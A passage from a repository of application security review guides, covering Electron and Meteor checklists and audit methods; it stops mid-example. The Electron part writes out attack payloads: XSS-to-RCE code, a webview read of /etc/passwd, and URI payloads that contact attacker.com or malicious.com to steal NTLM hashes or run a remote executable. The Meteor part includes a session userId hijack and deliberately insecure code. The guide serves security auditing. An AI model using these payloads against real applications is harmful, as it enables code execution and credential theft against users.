├── .gitignore
├── Electron JS
    └── README.md
├── LICENSE
├── Meteor JS
    └── README.md
├── README.md
├── Ruby on Rails
    └── README.md
└── _template.md


/.gitignore:
--------------------------------------------------------------------------------
 1 | # Binaries for programs and plugins
 2 | *.exe
 3 | *.exe~
 4 | *.dll
 5 | *.so
 6 | *.dylib
 7 | 
 8 | # Test binary, built with `go test -c`
 9 | *.test
10 | 
11 | # Output of the go coverage tool, specifically when used with LiteIDE
12 | *.out
13 | 
14 | # Dependency directories (remove the comment below to include it)
15 | # vendor/
16 | 


--------------------------------------------------------------------------------
/Electron JS/README.md:
--------------------------------------------------------------------------------
  1 | **Authors: [Pavel Shabarkin](https://www.linkedin.com/in/pavelshabarkin/)**
  2 | 
  3 | **Disclaimer: It is still under research, this guide can be extended.**
  4 | 
  5 | # Security Review for Electron JS applications
  6 | - [Security Checklist](#security-checklist)
  7 | - [Review Methodology](#review-methodology)
  8 | 	- [Getting Started](#getting-started)
  9 | 	- [0-click client-side RCE due to disabled isolation](#0-click-client-side-rce-due-to-disabled-isolation)
 10 | 	- [Reading Local Files through the `<webview>` tag](#reading-local-files-through-the-webview-tag)
 11 | 	- [Phishing and credential harvesting (Loading Unsafe Remote Content)](#phishing-and-credential-harvesting-loading-unsafe-remote-content)
 12 | 	- [1-click RCE or NTLM hash stealing through `shell.openExternal`](#1-click-rce-or-ntlm-hash-stealing-through-shellopenexternal)
 13 | - [Links and References](#links-and-references)
 14 | 
 15 | # Security Checklist
 16 | 
 17 | - [ ]  `loadURL` loads only `https://` links
 18 | - [ ]  `nodeIntegration` is disabled (`false`)
 19 | - [ ]  `contextIsolation` is enabled (`true`)
 20 | - [ ]  `sandbox` is enabled (`true`)
 21 | - [ ]  Permission request handlers are implemented (`.setPermissionRequestHandler`)
 22 | - [ ]  `webSecurity`  is enabled (`true`)
 23 | - [ ]  Content Security Policy (CSP) is defined
 24 | - [ ]  `allowRunningInsecureContent` is not used or is set to (`false`)
 25 | - [ ]  `experimentalFeatures` is disabled or not used (`false`)
 26 | - [ ]  `enableBlinkFeatures` is not used
 27 | - [ ]  `<webview>` tag does not use `allowpopups`
 28 | - [ ]  Application overwrites events `new-window` and `will-navigate`, and other event listeners
 29 | - [ ]  Application limits content to only from trusted origins (review navigation)
 30 | - [ ]  Verify WebView options before creation (reduce the attack vector for reading internal files through the `<webview>` tag)
 31 | - [ ]  Application limits the URL protocol before calling the `shell.openExternal` function invoke (`http://`, `https://`) or informs the user and provides a consent page that opening the next page can be a malicious action
 32 | 
 33 | # Review Methodology
 34 | 
 35 | ## Getting Started
 36 | 
 37 | Electron JS desktop applications are packed in the `asar` format, to retrieve the source code of the client side, we need to unpack it:
 38 | 
 39 | **install asar**
 40 | 
 41 | ```bash
 42 | npm install -g asar
 43 | ```
 44 | 
 45 | **extract the source code** 
 46 | 
 47 | ```bash
 48 | asar extract app.asar <OUT-FOLDER>
 49 | ```
 50 | 
 51 | **repack the source code**
 52 | 
 53 | ```bash
 54 | asar pack <FOLDER> app.asar
 55 | ```
 56 | 
 57 | **proxy an electron application**
 58 | 
 59 | Look for `require("electron")` importing to find the global variable, add the next 2 lines below into the code and repack the source code:
 60 | 
 61 | ```jsx
 62 | const electron = require("electron");
 63 | const app = electron.app;
 64 | app.commandLine.appendSwitch('proxy-server', '127.0.0.1:8080');
 65 | ```
 66 | 
 67 | ## 0-click client-side RCE due to disabled isolation
 68 | 
 69 | **For more details see the original research:** [**0-click RCE in Electron Applications**](https://shabarkin.medium.com/0-click-rce-in-electron-applications-1c4f81a2cd6b)
 70 | 
 71 | Look for `contextIsolation` and `nodeIntegration` options in any renderers ([BrowserWindow](https://www.electronjs.org/docs/latest/api/browser-window), [BrowserView](https://www.electronjs.org/docs/latest/api/browser-view), or [< webview >](https://www.electronjs.org/docs/latest/api/webview-tag)) that loads remote content. 
 72 | 
 73 | Prerequisites to straightforward RCE: 
 74 | 
 75 | `nodeIntegration` should be set to  `true`  (*Since in Electron version 5.0.0. the undefined* `nodeIntegration` *is set to `false` by default*)
 76 | 
 77 | `contextIsolation`  should be set to  `false`  (*Since in Electron version 12.0.0, the undefined `contextIsolation` is set to `true` by default*)
 78 | 
 79 | ```bash
 80 | grep -HanrE "contextIsolation|nodeIntegration"
 81 | ```
 82 | 
 83 | 1. If the `nodeIntegration` is set to `true`, an attacker would need to find XSS in the main web application and use the following JS Code to achieve client-side remote code execution: 
 84 | 
 85 | ```jsx
 86 | require("child_process").exec("uname -a",function(error,stdout,stderr){console.log(stdout);});
 87 | ```
 88 | 
 89 | 2. If the `contextIsolation` is set to `false`, an attacker would need to find XSS in the main web application and attack the built-in JavaScript functions or `preload:` scripts. 
 90 | 
 91 | **#preload_scripts:**
 92 | 
 93 | Identify functions in the preload scripts, which may satisfy the attack vector through XSS and use them in the JavaScript code of the malicious payload.
 94 | 
 95 | ```jsx
 96 | #preload.js:
 97 | ElectronRequire = require; 
 98 | delete require;
 99 | 
100 | #xss_payload:
101 | ElectronRequire("child_process").exec("uname -a",function(error,stdout,stderr){console.log(stdout);});
102 | ```
103 | 
104 | **#prototype_overwrite:**
105 | 
106 | Review the code of the main renderer and identify where the built-in JavaScript function is used (`Array.prototype.join` or `String.prototype.indexOf` any other), 
107 | 
108 | ```jsx
109 | RegExp.prototype.test=function(){
110 |     return false;
111 | }
112 | Array.prototype.join=function(){
113 |     return "calc";
114 | }
115 | DiscordNative.nativeModules.requireModule('discord_utils').getGPUDriverVersions();
116 | ```
117 | 
118 | Example of the `getGPUDriverVersions` function:
119 | 
120 | ```jsx
121 | module.exports.getGPUDriverVersions = async () => {
122 |   if (process.platform !== 'win32') {
123 |     return {};
124 |   }
125 | 
126 |   const result = {};
127 |   const nvidiaSmiPath = `${process.env['ProgramW6432']}/NVIDIA Corporation/NVSMI/nvidia-smi.exe`;
128 | 
129 |   try {
130 |     result.nvidia = parseNvidiaSmiOutput(await execa(nvidiaSmiPath, []));
131 |   } catch (e) {
132 |     result.nvidia = {error: e.toString()};
133 |   }
134 | 
135 |   return result;
136 | };
137 | ```
138 | 
139 | ## Reading Local Files through the `<webview>` tag
140 | 
141 | **For more details see the original research:** [****Facebook Messenger Desktop App Arbitrary File Read****](https://medium.com/@renwa/facebook-messenger-desktop-app-arbitrary-file-read-db2374550f6d)
142 | 
143 | If `contextIsolation` is set to `false`, you can try to use `<webview>` (similar to `<iframe>`, but it can load local files) to read local files and exfiltrate them: using something like  `<webview src="file:///etc/passwd"></webview>`
144 | 
145 | ```js
146 | <webview src="file:///etc/passwd"></webview>
147 | webview = document.querySelector("webview")
148 | webview.addEventListener('dom-ready', () => {
149 | 	setTimeout(function(){
150 | 		webview.executeJavaScript("alert(`Stolen page:\n\n`+document.body.innerText)")
151 | 	},1000)	
152 | })
153 | 
154 | ```
155 | 
156 | ## Phishing and credential harvesting (Loading Unsafe Remote Content)
157 | 
158 | **For more details see the original research:** [****Phishing and credential harvesting in Electron applications****](https://medium.com/@shabarkin/unsafe-content-loading-electron-js-76296b6ac028)
159 | 
160 | When the desktop application loads remote content, it should ensure that it is loaded from the trusted origin. Usually, the application allows third-party web applications to be loaded in the desktop window. It is difficult to limit navigation, when the main web application uses multiple integrations or embeddings from third-party web apps, the limitations are commonly implemented:
161 | 
162 | Grep the source code for the following snippet: `webContents.on(` and review `new-window`, `will-navigate`, and other navigation listeners:
163 | 
164 | ```jsx
165 | grep -HanrE "webContents\.on\("
166 | ```
167 | 
168 | **Example #1** of vulnerable code snippet: (missing escaped character `.` in the regexp)
169 | 
170 | ```jsx
171 | function openInternally (url) {
172 | 		validInternalUrls = ".*((subdomain.google.com)|(subdomain.apple.com)).*" //etc...
173 |     if (new RegExp(validInternalUrls, "i").test(url)) {
174 |         return true;
175 |     }
176 | 
177 |     return false;
178 | }
179 | 
180 | mainWindow.webContents.on("new-window", (event, newUrl, frameName, disposition, options) => {
181 |     if (!openInternally(newUrl)) {
182 |       event.preventDefault();
183 |       shell.openExternal(newUrl);
184 | 
185 |     } else {
186 |       event.preventDefault();
187 |       const newWindow = new BrowserWindow({
188 |         parent: mainWindow,
189 |       });
190 |       newWindow.loadURL(newUrl)
191 |     }});
192 | ```
193 | 
194 | The desktop app will load content in the desktop window from the following origin: 
195 | 
196 | `http://subdomainagoogleqcom.com`
197 | 
198 | **Example #2** of vulnerable code snippet: (Checks if strings in `allowedUrls` are included in the URL)
199 | 
200 | ```jsx
201 | mainWindow.webContents.on("new-window", (event, newUrl, frameName, disposition, options) => {
202 |     const allowedUrls = ['oauth', 'drive','onedrive','google'];
203 |     const openInWindow = allowedUrls.some(url => newUrl.includes(url));
204 | 
205 |     if (!openInWindow) {
206 |       event.preventDefault();
207 |       shell.openExternal(newUrl);
208 | 
209 |     } else {
210 |       event.preventDefault();
211 |       const oauthPopUp = new BrowserWindow({
212 |         parent: mainWindow,
213 |       });
214 |       oauthPopUp.loadURL(newUrl)
215 |     }
216 | });
217 | ```
218 | 
219 | The desktop app will load content in the desktop window from the following origin: 
220 | 
221 | `http://anydomain.com/oauth`
222 | 
223 | More of the similar regular expressions could be implemented, exploitation requires manual review.
224 | 
225 | ## 1-click RCE or NTLM hash stealing through `shell.openExternal`
226 | 
227 | **For more details see the original research:** [****1-click RCE in Electron Applications****](https://medium.com/@shabarkin/1-click-rce-in-electron-applications-79b52e1fe8b8)
228 | 
229 | Look for the usage of `shell.openExternal`, the URL parameter passed to the function should be user controlled. By reviewing the `new-window` event listener, most applications used `shell.openExternal` to open links in the browser, but the problem is that the URL protocol is not limited. When function `window.open("smb://malicious.com")` is invoked, the desktop application will enforce the device to start an smb connection to the malicious server, an attacker could steal the NTLM hashes of the user. This technique can be used in the Red Team activities.
230 | 
231 | Search for the sinks of the `shell.openExternal`:
232 | 
233 | ```jsx
234 | grep -HanrE "shell\.openExternal\("
235 | ```
236 | 
237 | The example of a vulnerable code snippet where `newUrl` is passed to `shell.openExternal(newUrl)` without limiting the URL protocol: 
238 | 
239 | ```jsx
240 | mainWindow.webContents.on("new-window", (event, newUrl, frameName, disposition, options) => {
241 |     const allowedUrls = ['oauth', 'drive','onedrive','google'];
242 |     const openInWindow = allowedUrls.some(url => newUrl.includes(url));
243 | 
244 |     if (!openInWindow) {
245 |       event.preventDefault();
246 |       shell.openExternal(newUrl);
247 | 
248 |     } else {
249 |       event.preventDefault();
250 |       const oauthPopUp = new BrowserWindow({
251 |         parent: mainWindow,
252 |       });
253 |       oauthPopUp.loadURL(newUrl)
254 |     }
255 | });
256 | ```
257 | 
258 | These payloads are based on the example above (The application can use the `shell.openExternal` function in other places, thus you need to find the way to deliver the URL into the function): 
259 | 
260 | ```jsx
261 | 1. HTLM Hash Stealing -> window.open("smb://malicious.com")
262 | 2. Client-side RCE #1 -> window.open("ms-msdt:id%20PCWDiagnostic%20%2Fmoreoptions%20false%20%2Fskip%20true%20%2Fparam%20IT_BrowseForFile%3D%22%5Cattacker.comsmb_sharemalicious_executable.exe%22%20%2Fparam%20IT_SelectProgram%3D%22NotListed%22%20%2Fparam%20IT_AutoTroubleshoot%3D%22ts_AUTO%22")
263 | 3. Client-side RCE #2 -> window.open("search-ms:query=malicious_executable.exe&crumb=location:%5C%[5Cattacker.com](http://5cattacker.com/)%5Csmb_share%5Ctools&displayname=Important%20update")
264 | 4. Client-side RCE #3 -> window.open("ms-officecmd:%7B%22id%22:3,%22LocalProviders.LaunchOfficeAppForResult%22:%7B%22details%22:%7B%22appId%22:5,%22name%22:%22Teams%22,%22discovered%22:%7B%22command%22:%22teams.exe%22,%22uri%22:%22msteams%22%7D%7D,%22filename%22:%22a:/b/%2520--disable-gpu-sandbox%2520--gpu-launcher=%22C:%5CWindows%5CSystem32%5Ccmd%2520/c%2520ping%252016843009%2520&&%2520%22%22%7D%7D")
265 | ```
266 | 
267 | # Links and References
268 | <details><summary>Links and References</summary><blockquote>
269 | 
270 | [Windows 10 RCE: The exploit is in the link | Positive Security](https://positive.security/blog/ms-officecmd-rce)
271 | 
272 | [The dangers of Electron's shell.openExternal()-many paths to remote code execution](https://benjamin-altpeter.de/shell-openexternal-dangers/#digging-deeper-into-how-shellopenexternal-actually-opens-urls)
273 | 
274 | [Security, Native Capabilities, and Your Responsibility | Electron](https://www.electronjs.org/docs/latest/tutorial/security#14-do-not-use-openexternal-with-untrusted-content)
275 | 
276 | [Build software better, together](https://github.com/wireapp/wire-desktop/security/advisories/GHSA-5gpx-9976-ggpm)
277 | 
278 | [Allow arbitrary URLs, expect arbitrary code execution | Positive Security](https://positive.security/blog/url-open-rce#windows-10-19042)
279 | 
280 | [webContents | Electron](https://www.electronjs.org/docs/latest/api/web-contents#event-new-window-deprecated)
281 | 
282 | [The dangers of Electron's shell.openExternal()-many paths to remote code execution](https://benjamin-altpeter.de/shell-openexternal-dangers/)
283 | 
284 | [Discord Desktop app RCE](https://mksben.l0.cm/2020/10/discord-desktop-rce.html?m=1)
285 | 
286 | [XSS to RCE Electron Desktop Apps](https://book.hacktricks.xyz/pentesting/pentesting-web/xss-to-rce-electron-desktop-apps)
287 | 
288 | [Awesome Electron JS Hacking](https://github.com/doyensec/awesome-electronjs-hacking)
289 | 
290 | [Pentesting Electron Applications - Global Bug Bounty Platform](https://blog.yeswehack.com/yeswerhackers/exploitation/pentesting-electron-applications/)
291 | 
292 | [Hacking Electron Applications](https://www.youtube.com/watch?v=jkJWA_CWrQs)
293 | 
294 | [Adventures in Hacking Electron Apps](https://dev.to/essentialrandom/adventures-in-hacking-electron-apps-3bbm)
295 | 
296 | [](https://doyensec.com/resources/us-17-Carettoni-Electronegativity-A-Study-Of-Electron-Security-wp.pdf)
297 | 
298 | [](https://doyensec.com/resources/Asia-19-Carettoni-Preloading-Insecurity-In-Your-Electron.pdf)
299 | 
300 | [Pentesting Electron Applications](https://cornerpirate.com/2021/02/11/pentesting-electron-applications/)
301 | 
302 | [Setting up Custom Proxy for Electron Webview](https://supersami.medium.com/setting-up-custom-proxy-for-electron-webview-109d78ce5e17)
303 | 
304 | [](https://benjamin-altpeter.de/doc/thesis-electron.pdf)
305 | </blockquote></details>
306 | 
307 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2021 Pavel Shabarkin
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/Meteor JS/README.md:
--------------------------------------------------------------------------------
  1 | **Authors: [Pavel Shabarkin](https://www.linkedin.com/in/pavelshabarkin/)**
  2 | 
  3 | **Disclaimer: It is still under research, this guide can be extended.**
  4 | 
  5 | # Security Review for Meteor JS applications
  6 | - [Security Checklist](#security-checklist)
  7 | - [Review Methodology](#review-methodology)
  8 | 	- [Getting Started](#getting-started)
  9 | 		- [Setup](#setup)
 10 | 		- [Identify Meteor JS file](#identify-meteor-js-file)
 11 | - [API keys and credentials leak](#api-keys-and-credentials-leak)
 12 | 	- [Shared source code](#shared-source-code)
 13 | 	- [`Meteor.settings` does not leak credentials](#meteorsettings-does-not-leak-credentials)
 14 | 	- [Client-side mongo collections does not leak app creds](#client-side-mongo-collections-does-not-leak-app-creds)
 15 | - [Missing authentication](#missing-authentication)
 16 | - [Missing authorization](#missing-authorization)
 17 | 	- [Collections direct interaction](#collections-direct-interaction) 
 18 | 	- [Meteor methods](#meteor-methods)
 19 | 	- [Meteor sub/pub](#meteor-subpub)
 20 | - [NoSQL Injections](#nosql-injections)
 21 | - [Cross Site Scripting (XSS) attacks](#cross-site-scripting-xss-attacks)
 22 | - [Links and References](#links-and-references)
 23 | 
 24 | 
 25 | # Security Checklist
 26 | 
 27 | - [ ]  The `insecure` or `autopublish` modes are not used
 28 | - [ ]  API keys, secrets, and credentials are not in the code base, client- and server-side code can be shared
 29 | - [ ]  API keys, secrets, and credentials are not in the `Meteor.settings` object
 30 | - [ ]  API keys, secrets, and credentials of the app are not in the public Mongo collections
 31 | - [ ]  Meteor Iron has implemented authentication and authorization mechanisms. Look for `Router\.route\(`.
 32 | - [ ]  Collections cannot be updated from the client-side, look for `\.allow\(` pattern within code base
 33 | - [ ]  Collections which defined `allow` rule, have `deny` rule for rest of the actions.
 34 | - [ ]  The application denies all updates to user profile, look for `Meteor\.users\.deny\(` within code base
 35 | - [ ]  The user IDs are not user controllable in the arguments of Meteor methods and publications, they should validate the the user’s id from this instruction only: `this\.userId`
 36 | - [ ]  The user IDs are not user controllable by hijacking the Meteor session `userId`, they should validate a user’s id from this instruction only: `this\.userId`
 37 | - [ ]  The Meteor publications had implemented authorization access control in the returned query and not within the publication function.
 38 | - [ ]  Selectors and [filter fields](http://guide.meteor.com/security.html#fields) are applied in publications before returning the data.
 39 | - [ ]  The application does not allow executing arbitrary NoSQL selectors coming from client-side, as a best practice they should not be user controlled at all.
 40 | - [ ]  The raw HTML inclusion is not used in Blaze, look for triple mustache: `{{{`
 41 | - [ ]  Set up secure [HTTP headers](https://guide.meteor.com/security.html#httpheaders) using [Helmet](https://www.npmjs.com/package/helmet), not all browsers support it so it provides an extra layer of security to users with modern browsers.
 42 | 
 43 | # Review Methodology
 44 | 
 45 | ## Getting started
 46 | 
 47 | ### Setup
 48 | 
 49 | When you use `Meteor.method`*,* `Meteor.call`, `Meteor.publish` and `Meteor.subscribe`, Meteor is using DDP underneath. In short, DDP is a JSON based protocol which Meteor had implemented on top of **SockJS**. It serves to create a full duplex communication between client and server where it can change data and react to its changes.
 50 | 
 51 | [Users and Accounts | Meteor Guide](https://guide.meteor.com/accounts.html#userid-ddp)
 52 | 
 53 | It is possible to find the DDP connection created by Meteor on the client-side by accessing a variable called **`_stream`**, on the Meteor global object. You need to run the following snippet in the browser console to track everything going through the DDP and easy debug and test Meteor communication between client- and server- sides:
 54 | 
 55 | ```jsx
 56 | var oldSend = Meteor.connection._stream.send;
 57 | 
 58 | Meteor.connection._stream.send = function() {
 59 |   oldSend.apply(this, arguments);
 60 |   console.log(arguments[0]);
 61 | };
 62 | 
 63 | Meteor.connection._stream.on('message', function (msg) {
 64 |   console.log(msg);
 65 | });
 66 | ```
 67 | 
 68 | [Hacking Meteor DDP | HackerNoon](https://hackernoon.com/hacking-meteor-ddp-9da37790b37b)
 69 | 
 70 | ### Identify Meteor JS file
 71 | 
 72 | Meteor is a full-stack framework for building JavaScript applications. This means Meteor applications differ from most applications in that they include code that runs on the client, inside a web browser or Cordova mobile app, code that runs on the server, inside a Node.js container, and common code that runs in both environments.
 73 | 
 74 | There is 2 ways to review the source code of the Meteor JS: 
 75 | 
 76 | 1. Open user’s browser, then developer tools and search for JS bundles
 77 | 2. When a Meteor application is built for deployment with meteor build, all JavaScript files and templates are packaged and minimized into a single file. This can also be emulated with meteor run `--production`. We can see the minimized code when we look at the source of a built Meteor application.
 78 | 
 79 | > **Never use  `--production` flag to deploy!**
 80 | > 
 81 | > - `--production` flag is purely meant to simulate production minification, but does almost nothing else. This still watches source code files, exchanges data with package server and does a lot more than just running the app, leading to unnecessary computing resource wasting and security issues. Please don’t use `--production` flag to deploy!
 82 | 
 83 | Main HTML file of application may include similar JS file to load the application based on the Meteor JS: 
 84 | 
 85 | ```jsx
 86 | <script type="text/javascript" src="https://domain.com/ab931b030c581324ksdc123d141b1244e470b6e6.js?meteor_js_resource=true"></script>
 87 | ```
 88 | 
 89 | # API keys and credentials leak
 90 | 
 91 | ## Shared source code
 92 | 
 93 | It is not rare to find hardcoded credentials, API keys, and tokens within the Meteor code base. Meteor JS may use the same JS file for server-side and client-side. However, Meteor JS has an option to hide server side code, the developers should put the server-side code into the `server/` folder, then it will not be accessible from client-side.
 94 | 
 95 | The extensive list of API calls prepared to verify and validate all the identified API credentials:
 96 | 
 97 | [https://github.com/streaak/keyhacks](https://github.com/streaak/keyhacks)
 98 | 
 99 | ## `Meteor.settings` does not leak credentials
100 | 
101 | Another source of potential credential leak is the `Meteor.settings` object
102 | 
103 | > In most normal situations, API keys from your settings file will only be used by the server, and by default the data passed in through `--settings`
104 | is only available on the server. However, if you put data under a special key called `public`, it will be available on the client. You might want to do this if, for example, you need to make an API call from the client and are OK with users knowing that key. Public settings will be available on the client under `Meteor.settings.public`.
105 | > 
106 | 
107 | Open the browser console and run the `Meteor.settings` command, review for any sensitive information
108 | 
109 | ## Client-side mongo collections does not leak app creds
110 | 
111 | Open the browser console and run the `Mongo.Collection.getAll()` command, then review Mongo collections for secrets, credentials, API keys, tokens and more of the same ... 
112 | 
113 | # Missing authentication
114 | 
115 | Having access to the source code (server-side code), review REST API endpoints defined by Meteor Iron, look for `Router\.route\(` pattern. Those API endpoint may miss authentication, work with, and return high-sensitive information:
116 | 
117 | **#examples:** 
118 | 
119 | ```jsx
120 | Router.route('/api/pull/:userId/', {
121 |   where: 'server'
122 | }).get(function() {
123 | 
124 | **// there is no middleware authentication check, so the following instructions are run without checking authentication:** 
125 | 
126 | 	const userId = this.params.userId;
127 |   let result = Meteor.users.find().fetch();
128 | 
129 |   this.response.writeHead(200, { 'Content-Type': 'application/json' });
130 |   this.response.end(JSON.stringify(result));
131 | }
132 | 
133 | Router.route('/api/push/:userId/:accessToken', {
134 |   where: 'server'
135 | }).get(function() { ... }
136 | 
137 | Router.route('/api/import/:userId/:fileId', {
138 |   where: 'server'
139 | }).post(function() { ... }
140 | ```
141 | 
142 | # Missing authorization
143 | 
144 | Extra important to determine what is run on the server only and what can be run on the client. The Meteor applications have the following attack surface in terms of authorization:
145 | 
146 | 1. **Methods**: Any data that comes in through Method arguments needs to be validated, and Methods should not return data the user shouldn’t have access to.
147 | 2. **Publications**: Any data that comes in through publication arguments needs to be validated, and publications should not return data the user shouldn’t have access to.
148 | 3. **Served files**: You should make sure none of the source code or configuration files served to the client have secret data.
149 | 
150 | ## Collections direct interaction
151 | 
152 | Since Meteor apps have architecture that puts client and server code together. In some cases, client can access Mongo Collections directly. If the Mongo Collection has an `allow` definition on the collection actions on the server-side, it will be accessible from the client side. There is several potential problems, the application can have:
153 | 
154 | **#allow rule**
155 | 
156 | The application allows performing actions on other user’s records. Any user would be able to update any record in the `OAuth` collection:
157 | 
158 | ```jsx
159 | OAuth.allow({
160 | 	update(userId, doc, fields, modifier) {
161 | 		// Can change any OAuth records.
162 |     return userId
163 |   },
164 | });
165 | ```
166 | 
167 | But the ability to update any record can be stricted this way:
168 | 
169 | ```jsx
170 | OAuth.allow({
171 | update(userId, doc, fields, modifier) {
172 |     // Can only change your own OAuth records.
173 |     return doc.owner === userId;
174 |   },
175 | ```
176 | 
177 | > If you never set up any `allow` rules on a collection then all client writes to the collection will be denied, and it will only be possible to write to the collection from server-side code.
178 | > 
179 | 
180 | However, if the Meteor app is run in `insecure` mode, and the application did not set up any `allow` or `deny` rules on a collection, then all users have full write access to the collection.
181 | 
182 | **New Meteor projects start in insecure mode by default.** To turn it off just run in your terminal: `meteor remove insecure`
183 | 
184 | **#deny rule**
185 | 
186 | The `deny` rule ensures that action on the collection is denied. When a client tries to write to a collection, the Meteor server first checks the collection’s `deny` rules. If none of them return `true` then it checks the collection’s `allow` rules. Meteor allows the write only if no `deny` rules return `true` and at least one `allow` rule returns `true`.
187 | 
188 | What means if application define at least one `allow` rule, and other rules are not redefined with `deny`, the client side will able to work with any actions on the collection.
189 | 
190 | **#profile editing** 
191 | 
192 | User profile editing should be always disabled: 
193 | 
194 | ```jsx
195 | Meteor.users.deny({
196 |   update: function () {
197 |       return true;
198 |   }
199 | });
200 | ```
201 | 
202 | Look for `\.deny\(` and `\.allow\(` and determine how the application defined rules’ logic accordingly to this paper, [https://guide.meteor.com/security.html#allow-deny](https://guide.meteor.com/security.html#allow-deny), and [https://docs.meteor.com/api/collections.html#Mongo-Collection-deny](https://docs.meteor.com/api/collections.html#Mongo-Collection-deny). 
203 | 
204 | The general recommendation to avoid using `allow` and `deny` rules, and switch to the Meteor methods instead. This will reduce the risk that all collection operations will be accessible to the client, if the app is deployed in the `insecure` mode. And it’s easier to maintain and scale the application. But those Meteor method should have a solid implementation of the authorization mechanism.
205 | 
206 | ## Meteor methods
207 | 
208 | Meteor methods are remote call procedure system in other words an interface to interact with a server-side. If to compare with the REST API architecture, an Meteor methods are something like GET, POST requests. The main attack surface against Meteor methods is that applications do not have proper implementation of authorization access controls. 
209 | 
210 | Meteor methods can be defined in the following methods: 
211 | 
212 | 1. **Basic method** is defined such as a general function in JavaScript, [https://guide.meteor.com/methods.html#basic](https://guide.meteor.com/methods.html#basic)
213 | 2. ****Advanced Method boilerplate**** is defined with a wrapper on the object level, [https://guide.meteor.com/methods.html#advanced-boilerplate](https://guide.meteor.com/methods.html#advanced-boilerplate)
214 | 3. ****Advanced Methods with mdg:validated-method**** is defined with a wrapper on the package level, [https://guide.meteor.com/methods.html#validated-method](https://guide.meteor.com/methods.html#validated-method)
215 | 
216 | There is several patterns to map and identify those methods. If you have the full source code you may target, grep, and look for the following patterns: 
217 | 
218 | 1. Grep `Meteor\.methods\(\{`, each `function_name:` inside the `Meteor.methods` is a defined Meteor Method
219 | 2. Grep `ValidatedMethod\(\{`, each `name: ‘function.name’` inside the `ValidatedMethod` is a defined Meteor Method
220 | 
221 | If you have the shared source code and don’t have access to the hidden code located on the server, you can identify the app.js file and grep for their `Meteor\.call\(` instructions. 
222 | 
223 | There is several examples of poor implementation of authorization access controls. 
224 | 
225 | 1. Never pass `userId` as an argument of the method, `this.userId` is not user controllable, it works underneath of meteor DDP and cannot be changed to arbitrary `userId`:
226 |     
227 |     ```jsx
228 |     // #1: Bad! The client could pass any user ID and set someone else's name
229 |     setName({ userId, newName }) {
230 |       Meteor.users.update(userId, {
231 |         $set: { name: newName }
232 |       });
233 |     }
234 |     
235 |     // #2: Good, the client can only set the name on the currently logged in user
236 |     setName({ newName }) {
237 |       Meteor.users.update(this.userId, {
238 |         $set: { name: newName }
239 |       });
240 |     }
241 |     ```
242 |     
243 |     The following rule applies for all Mongo collections, not only for the user profile collection. If the Meteor method does not check the legitimate owner of the record before executing any operation over it, the application will allow arbitrary users to work with records of other app users.
244 |     
245 | 2. But the `Meteor.userId()` is user controlled! A user can fool the application by hijacking the `userId` of the session connection, the authorization within Meteor methods will be bypassed, because they rely on the returned value of the `Meteor.userId()` function:
246 |     
247 |     ```jsx
248 |     // #1: Bad! The client could pass any user ID by hijacking the session userId and set someone else's name
249 |     setName({ newName }) {
250 |       Meteor.users.update(Meteor.userId(), {
251 |         $set: { name: newName }
252 |       });
253 |     }
254 |     
255 |     // #2: Good, the client can only set the name on the currently logged in user
256 |     setName({ newName }) {
257 |       Meteor.users.update(this.userId, {
258 |         $set: { name: newName }
259 |       });
260 |     }
261 |     ```
262 |     
263 |     To hijack the `userId`, run the following command in the browser console: 
264 |     
265 |     ```jsx
266 |     Meteor.connection.setUserId("USER_ID");
267 |     ```
268 |     
269 | 
270 | ## Meteor sub/pub
271 | 
272 | The Meteor subscription and publishing mechanisms are actually the way Meteor server- and client-sides interact and pass data to each other. Through publications Meteor server makes data available to a client. The main security issue of the publishing mechanism that Meteor server can return unintended data to a malicious user.
273 | 
274 | The general rules prepared for Meteor Methods should be also applied for the publications:
275 | 
276 | 1. Validate all arguments using `check` or npm `simpl-schema`.
277 | 2. Never pass the current user ID as an argument, and never rely on `Meteor.userId()` object.
278 | 3. Use rate limiting to stop people from spamming you with subscriptions.
279 | 
280 | **#exposing of secret data**
281 | 
282 | The functionality of the publications opened up additional attack vectors. All the Mongo collections have the `fields` option that restricts a collection returning only requested records. It prevents the accidental publishing of secret data.
283 | 
284 | ```jsx
285 | // #1: Bad! The application will return the OAuth access and refresh tokens to the client-side
286 | Meteor.publish('oauth.public', function () {
287 |   return OAuth.find({userId: {$exists: false}});
288 | });
289 | 
290 | // #2: Good, The application will return only public OAuth information 
291 | Meteor.publish('oauth.public', function () {
292 |   return OAuth.find({userId: {$exists: false}}, {
293 |     fields: {
294 |       name: 1,
295 |       IntegrationName: 1,
296 |       userId: 1
297 |     }
298 |   });
299 | });
300 | ```
301 | 
302 | If the `Meteor\.publish\(` functions missed `fields:` option, it may leak secret data all depends on the data stored in the collection. Review all the  `Meteor\.publish\(` functions and determine functions which return entire record or does not exclude secret data to be returned to the client.
303 | 
304 | The `fields:` option should be declared on the server-side only, it should never be user controlled!
305 | 
306 | **#authorization**
307 | 
308 | Authorization concepts of Meteor publications are similar to the Meteor methods. The `Meteor.userId()` is user controlled! A user can fool the application by hijacking the `userId` of the session connection, the authorization within Meteor publications will be bypassed, because they rely on the returned value of the `Meteor.userId()` function:
309 | 
310 | ```jsx
311 | // #1: Bad! The client could pass any user ID by hijacking the session userId and set someone else's name
312 | Meteor.publish('oauth', function (oauthId) {
313 | 
314 |   const oauth = OAuth.findOne(oauthId);
315 | 
316 |   if (oauth.userId !== Meteor.userId()) {
